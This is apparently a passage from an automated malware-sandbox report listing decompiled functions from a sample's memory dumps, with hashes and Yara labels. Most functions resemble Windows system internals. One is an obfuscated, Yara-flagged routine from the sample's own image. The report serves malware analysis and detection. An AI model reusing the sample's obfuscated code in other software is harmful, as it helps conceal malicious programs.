				return E033EB640(E033E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                          0x0346138a
                                          0x0346138a
                                          0x03461399
                                          0x034613a3
                                          0x034613a8
                                          0x034613aa
                                          0x034613b5
                                          0x034613bb
                                          0x034613c3
                                          0x034613c6
                                          0x034613c9
                                          0x034613d4
                                          0x034613e6
                                          0x034613d6
                                          0x034613df
                                          0x034613df
                                          0x034613f1
                                          0x034613f2
                                          0x034613f4
                                          0x034613f9
                                          0x0346140e

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0071bb34cf1c0a0bd4d94650d257a13d55113b9b76cdddcc400fb26f5373324a
                                          • Instruction ID: 681e8235a1bbf54e05a716c4a00ba21d484e46b6bb3c64f90692a1201b78f856
                                          • Opcode Fuzzy Hash: 0071bb34cf1c0a0bd4d94650d257a13d55113b9b76cdddcc400fb26f5373324a
                                          • Instruction Fuzzy Hash: 5D014075E00358AFDB14EFA9D885AAEB7B8EF44710F404056B905AF280D6749A41CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 034614FB, Relevance: .0, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 61%
                                          			E034614FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x349d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E033EFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E033C7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E033EB640(E033E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                          0x034614fb
                                          0x034614fb
                                          0x0346150a
                                          0x03461514
                                          0x03461519
                                          0x0346151b
                                          0x03461526
                                          0x0346152c
                                          0x03461534
                                          0x03461537
                                          0x0346153a
                                          0x03461545
                                          0x03461557
                                          0x03461547
                                          0x03461550
                                          0x03461550
                                          0x03461562
                                          0x03461563
                                          0x03461565
                                          0x0346156a
                                          0x0346157f

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f1cb6e80447a3bdfc4384c5a33ae473e70e85479b89fd24bc942e075f1b53749
                                          • Instruction ID: 8f68e09162f9ccbd759488fd9e879c3184d654ac172532054b0fb9ef470bdca3
                                          • Opcode Fuzzy Hash: f1cb6e80447a3bdfc4384c5a33ae473e70e85479b89fd24bc942e075f1b53749
                                          • Instruction Fuzzy Hash: 53018075E00258AFCB10EF68D845EAEB7B8EF44700F404056B915EF380D674DE00CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033A58EC, Relevance: .0, Instructions: 47COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E033A58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x349d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x3385c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E033A5943() != 0 &&  *0x3495320 > 5) {
					E03427B5E( &_v44, _t27);
					_t22 =  &_v28;
					E03427B5E( &_v28, _t28);
					_t11 = E03427B9C(0x3495320, 0x338bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E033EB640(_t11, _t17, _v8 ^ _t29, 0x338bf15, _t27, _t28);
			}















                                          0x033a58fb
                                          0x033a58fe
                                          0x033a5906
                                          0x033a590a
                                          0x033a593c
                                          0x033a593c
                                          0x033a590c
                                          0x033a590c
                                          0x033a5911
                                          0x00000000
                                          0x033a5913
                                          0x033a5913
                                          0x033a5913
                                          0x033a5911
                                          0x033a591d
                                          0x03401035
                                          0x0340103c
                                          0x0340103f
                                          0x03401056
                                          0x03401056
                                          0x033a593b

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2a5b3c8cbfc1deb20fb577a0685cbf67c130a15abe524f1419ebbfe0947148cf
                                          • Instruction ID: 839feb1147d9c5f539c7be13c3a07104de7fe1621819d01f67f018ea3c68017d
                                          • Opcode Fuzzy Hash: 2a5b3c8cbfc1deb20fb577a0685cbf67c130a15abe524f1419ebbfe0947148cf
                                          • Instruction Fuzzy Hash: 3101F735A04618EBDB14EB2DDC809AEBBBCEF46230F98006EE845AF645DE30DD01C654
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0345FE3F, Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E0345FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x349d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E033EFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E033C7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E033EB640(E033E9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                          0x0345fe3f
                                          0x0345fe3f
                                          0x0345fe4e
                                          0x0345fe58
                                          0x0345fe5d
                                          0x0345fe5f
                                          0x0345fe6a
                                          0x0345fe72
                                          0x0345fe75
                                          0x0345fe78
                                          0x0345fe83
                                          0x0345fe95
                                          0x0345fe85
                                          0x0345fe8e
                                          0x0345fe8e
                                          0x0345fea0
                                          0x0345fea1
                                          0x0345fea3
                                          0x0345fea8
                                          0x0345febd

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d3b02a98cddfcd82821d2e7baa0dfc21d4391ac04e5cadba04cdfad91963b94f
                                          • Instruction ID: df4d0bbf17994e47883e16dc0ae13570784a28ecc915a2bc158f76960a6e3cc5
                                          • Opcode Fuzzy Hash: d3b02a98cddfcd82821d2e7baa0dfc21d4391ac04e5cadba04cdfad91963b94f
                                          • Instruction Fuzzy Hash: BB018475E00358AFCB14EFA9D846FAEB7B8EF44700F004066B900AF381DA749901CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0345FEC0, Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E0345FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x349d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E033EFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E033C7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E033EB640(E033E9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                          0x0345fec0
                                          0x0345fec0
                                          0x0345fecf
                                          0x0345fed9
                                          0x0345fede
                                          0x0345fee0
                                          0x0345feeb
                                          0x0345fef3
                                          0x0345fef6
                                          0x0345fef9
                                          0x0345ff04
                                          0x0345ff16
                                          0x0345ff06
                                          0x0345ff0f
                                          0x0345ff0f
                                          0x0345ff21
                                          0x0345ff22
                                          0x0345ff24
                                          0x0345ff29
                                          0x0345ff3e

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cad2c3c7adf06abaafae4419f799fb889a5d884ffd6e04453bacd5c26c26639c
                                          • Instruction ID: c013f10798bb7f63df10d03f865ab7169d5f339d5f2430bcea75d1291126673d
                                          • Opcode Fuzzy Hash: cad2c3c7adf06abaafae4419f799fb889a5d884ffd6e04453bacd5c26c26639c
                                          • Instruction Fuzzy Hash: 7A018475E00318AFCB14EBA9D845FAFB7B8EF45700F404066B901EF381DA749A01CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033BB02A, Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033BB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E033C7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E03427016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                          0x033bb037
                                          0x033bb039
                                          0x033bb03b
                                          0x033bb040
                                          0x0340a60e
                                          0x00000000
                                          0x00000000
                                          0x0340a61d
                                          0x033bb04b
                                          0x033bb04e
                                          0x0340a627
                                          0x0340a634
                                          0x00000000
                                          0x00000000
                                          0x0340a641
                                          0x0340a653
                                          0x0340a643
                                          0x0340a64c
                                          0x0340a64c
                                          0x0340a65b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0340a66c
                                          0x033bb057
                                          0x033bb057
                                          0x033bb057
                                          0x033bb046
                                          0x033bb046
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                          • Instruction ID: 6aa6df1945af5ac16194eb061376417e6e746b1be92bd4af08d568bc13e9af1a
                                          • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                          • Instruction Fuzzy Hash: EF015E71204A809FD322D75DC988FBAB7FCEB45650F0904A2AA15CFAA1DB38DC40C624
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03471074, Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E03471074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0347165E(__ebx, 0x3498ae4, (__edx -  *0x3498b04 >> 0x14) + (__edx -  *0x3498b04 >> 0x14), __edi, __ecx, (__edx -  *0x3498b04 >> 0x14) + (__edx -  *0x3498b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0346AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E033C7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0345FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                          0x03471074
                                          0x03471080
                                          0x03471082
                                          0x0347108a
                                          0x0347108f
                                          0x03471093
                                          0x034710ab
                                          0x034710ab
                                          0x034710c3
                                          0x034710cf
                                          0x034710e1
                                          0x034710d1
                                          0x034710da
                                          0x034710da
                                          0x034710e9
                                          0x034710f5
                                          0x034710f5
                                          0x034710fe

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a266a6a004b3114f287da9a590c66f6ea0bcea2f6a4274b0cba873e67308d3e3
                                          • Instruction ID: 4358a84ee6af881d37b68cc1828b07bb5e5a0102d3bbd50f7085521e49ba8af3
                                          • Opcode Fuzzy Hash: a266a6a004b3114f287da9a590c66f6ea0bcea2f6a4274b0cba873e67308d3e3
                                          • Instruction Fuzzy Hash: AD0128765047819FC710EF2AC844B5BB7D9AB84210F04851BF8869B791DE30D844CB96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03478A62, Relevance: .0, Instructions: 44COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E03478A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x349d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E033C7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E033EB640(E033E9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                          0x03478a62
                                          0x03478a71
                                          0x03478a79
                                          0x03478a82
                                          0x03478a85
                                          0x03478a89
                                          0x03478a8c
                                          0x03478a8f
                                          0x03478a92
                                          0x03478a95
                                          0x03478a9f
                                          0x03478ab1
                                          0x03478aa1
                                          0x03478aaa
                                          0x03478aaa
                                          0x03478abc
                                          0x03478abd
                                          0x03478abf
                                          0x03478ac4
                                          0x03478ada

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cea050f09ad4110f887c2f48713345d4e6f4541e40890aff26b39f475310f8dc
                                          • Instruction ID: db1cae75df472400867973781af2f2a58015ca79a824dbe37d07226fe7318bcf
                                          • Opcode Fuzzy Hash: cea050f09ad4110f887c2f48713345d4e6f4541e40890aff26b39f475310f8dc
                                          • Instruction Fuzzy Hash: 38011AB5E00219AFCB00DFA9D9859EEBBB8EF48310F10405AF905EB381D634A9018BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03478ED6, Relevance: .0, Instructions: 44COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E03478ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x349d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E033C7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E033EB640(E033E9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                          0x03478ed6
                                          0x03478ee5
                                          0x03478eed
                                          0x03478ef0
                                          0x03478efa
                                          0x03478f03
                                          0x03478f0c
                                          0x03478f15
                                          0x03478f24
                                          0x03478f27
                                          0x03478f31
                                          0x03478f43
                                          0x03478f33
                                          0x03478f3c
                                          0x03478f3c
                                          0x03478f4e
                                          0x03478f4f
                                          0x03478f51
                                          0x03478f56
                                          0x03478f69

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7deea4f8e7d7ac694d033fb5886fd2708f20480e4e9d413b58dd3027f7a91782
                                          • Instruction ID: ab7609533476ac3e1371f0af29e7c0612aa8105a09c9e27cc2780b29f2776918
                                          • Opcode Fuzzy Hash: 7deea4f8e7d7ac694d033fb5886fd2708f20480e4e9d413b58dd3027f7a91782
                                          • Instruction Fuzzy Hash: 34112174E002599FDB04DFA8D545BAEF7F4FF08300F0442AAE919EB381E6349941CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033ADB60, Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033ADB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E033ADB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E033AE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L033AE8B0(__ecx, _t14, 0xfff);
							L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                          0x033adb64
                                          0x033adb66
                                          0x033adb6b
                                          0x033adbaa
                                          0x033adb71
                                          0x033adb76
                                          0x033adb7a
                                          0x033adba3
                                          0x033adb7c
                                          0x033adb87
                                          0x033adb8b
                                          0x03404fa1
                                          0x03404fb3
                                          0x03404fb8
                                          0x033adb91
                                          0x033adb96
                                          0x033adb98
                                          0x033adb98
                                          0x033adb8b
                                          0x033adb7a
                                          0x033adb9d
                                          0x033adba2

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                          • Instruction ID: bbb6d0a338ce4e4dc6eaf97f8248f5a645b288eba01015a25765dbe7c3aa55ca
                                          • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                          • Instruction Fuzzy Hash: B6F0C837601E229BD332DA5D48E4B2BA6D9CF81A60F190435F1059FB44CA608C0286D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033AB1E1, Relevance: .0, Instructions: 42COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033AB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E033C7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E033C7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E03427016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                          0x033ab1e8
                                          0x033ab1ea
                                          0x033ab1f3
                                          0x03404a17
                                          0x033ab1f9
                                          0x033ab1f9
                                          0x033ab1f9
                                          0x033ab201
                                          0x03404a21
                                          0x03404a2e
                                          0x00000000
                                          0x00000000
                                          0x03404a3b
                                          0x03404a4d
                                          0x03404a3d
                                          0x03404a46
                                          0x03404a46
                                          0x03404a55
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033ab20a
                                          0x033ab20a
                                          0x033ab20a
                                          0x033ab20a

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                          • Instruction ID: 2030cce53024ea48531f51de20d5fc5d9ff106fa76d7ffeacfd84bebe7636f4e
                                          • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                          • Instruction Fuzzy Hash: 6F01A232300A809FD322D65EC844F5ABB98EF81750F0C00A2EA159F7A2D674CC008B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041BE22, Relevance: .0, Instructions: 39COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 81%
                                          			E0041BE22(unsigned int __ecx, void* __eflags) {
				signed int _t3;
				signed int _t9;
				intOrPtr _t11;
				signed int _t18;
				void* _t19;

				asm("xlatb");
				asm("aas");
				 *__ecx =  *__ecx >> 0x45;
				if(__eflags > 0) {
					 *(_t19 + 1 - 0x3e74fdf4) =  *(_t19 + 1 - 0x3e74fdf4) | __ecx;
					_t9 = (_t3 << 0x00000012 ^ __ecx >> 0x00000007) & 0x0007ffff ^ __ecx << 0x00000012 ^ __ecx >> 0x0000000d ^ 0x0618d8cb;
					__eflags = _t9;
					return _t9;
				} else {
					asm("daa");
					_push(0x73d67e85);
					asm("arpl [ecx+0x7ffe0018], sp");
					__eax =  *0x7ffe0018;
					if(__eflags > 0) {
						_t11 =  *0x7ffe0014;
						_t18 =  *0x7ffe001c;
						do {
						} while (__ecx != _t18);
						return _t11;
					} else {
						__eax = __eax | 0x7ffe0014;
						__eflags = __eax;
						__edx =  *0x7ffe001c;
						do {
							__eflags = __eax - __edx;
						} while (__eax != __edx);
						__ecx = __ecx << 0x12;
						__ecx = __ecx >> 7;
						__eax = __ecx << 0x00000012 ^ __ecx >> 0x00000007;
						__edx = __ecx;
						__eax = (__ecx << 0x00000012 ^ __ecx >> 0x00000007) & 0x0007ffff;
						__edx = __ecx << 0x12;
						__eax = (__ecx << 0x00000012 ^ __ecx >> 0x00000007) & 0x0007ffff ^ __ecx << 0x00000012;
						__eax = __eax ^ __ecx;
						__eax = __eax ^ 0x0618d8cb;
						__eflags = __eax;
						return __eax;
					}
				}
			}








                                          0x0041be22
                                          0x0041be23
                                          0x0041be24
                                          0x0041be27
                                          0x0041bdfa
                                          0x0041be1b
                                          0x0041be1b
                                          0x0041be21
                                          0x0041be29
                                          0x0041be29
                                          0x0041be2a
                                          0x0041be2f
                                          0x0041be30
                                          0x0041be34
                                          0x0041bdc6
                                          0x0041bdcb
                                          0x0041bdd1
                                          0x0041bdd1
                                          0x0041bdd5
                                          0x0041be36
                                          0x0041be36
                                          0x0041be36
                                          0x0041be3b
                                          0x0041be41
                                          0x0041be41
                                          0x0041be41
                                          0x0041be47
                                          0x0041be4c
                                          0x0041be4f
                                          0x0041be51
                                          0x0041be53
                                          0x0041be58
                                          0x0041be5b
                                          0x0041be60
                                          0x0041be62
                                          0x0041be62
                                          0x0041be67
                                          0x0041be67
                                          0x0041be34

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cfc953a792a43676d6604aeac7a866adec2618d628227d1ba328bc696dd70577
                                          • Instruction ID: c50ebed5090916a713086e0c7991e9c379a97272a26e1d7e9680f5a873fa0e09
                                          • Opcode Fuzzy Hash: cfc953a792a43676d6604aeac7a866adec2618d628227d1ba328bc696dd70577
                                          • Instruction Fuzzy Hash: E3F0E937B205014713DCE525D8014573383DBC2244378CA3CC576EA359CA2CC613D688
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0343FE87, Relevance: .0, Instructions: 38COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E0343FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x349d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E033C7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E033EB640(E033E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                          0x0343fe96
                                          0x0343fe9e
                                          0x0343fea1
                                          0x0343fead
                                          0x0343feb3
                                          0x0343feb9
                                          0x0343fec3
                                          0x0343fed5
                                          0x0343fec5
                                          0x0343fece
                                          0x0343fece
                                          0x0343fee0
                                          0x0343fee1
                                          0x0343fee3
                                          0x0343fee8
                                          0x0343fefb

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 342a2fb881f4246035ebaee373ceb37aa719b5173abd945c80352958f4024b7c
                                          • Instruction ID: 3c122452e84d3370b0682d55954609ec4f4bd526210e9c810d7e0dd2dbfbb50b
                                          • Opcode Fuzzy Hash: 342a2fb881f4246035ebaee373ceb37aa719b5173abd945c80352958f4024b7c
                                          • Instruction Fuzzy Hash: B5014F74E00208AFCB14DFA8D546A6EB7F4EF09300F14415AB915EF382D635D901CB44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03478F6A, Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 48%
                                          			E03478F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
